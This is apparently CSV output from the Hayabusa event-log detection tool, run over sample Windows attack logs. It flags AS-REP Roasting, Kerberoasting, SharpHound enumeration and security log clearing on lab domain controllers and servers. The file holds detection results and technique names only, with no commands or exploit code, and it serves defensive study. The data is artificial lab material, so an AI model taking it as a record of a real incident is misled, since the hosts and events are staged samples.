2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54633 : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54635 : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.2 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54374 : LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: 192.168.1.100 : Port: 54375 : LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54376 : LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54379 : LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54388 : LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54389 : LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice : Workstation: : IP Address: 192.168.1.200 : Port: 40316 : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.200 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL : Service: sql101 : IP Address: ::ffff:192.168.1.200 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx
2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx
2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62173 : LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62188 : LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62190 : LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62194 : LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62169 : LogonID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62167 : LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62170 : LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62182 : LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62175 : LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62178 : LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62179 : LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62180 : LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62184 : LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62168 : LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62172 : LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62183 : LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62187 : LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62186 : LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62189 : LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62193 : LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62192 : LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62191 : LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62195 : LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62196 : LogonID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62197 : LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62198 : LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62199 : LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62200 : LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62211 : LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62209 : LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62219 : LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62222 : LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62223 : LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62210 : LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62208 : LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62218 : LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62216 : LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62217 : LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62220 : LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62221 : LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62224 : LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62234 : LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62235 : LogonID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
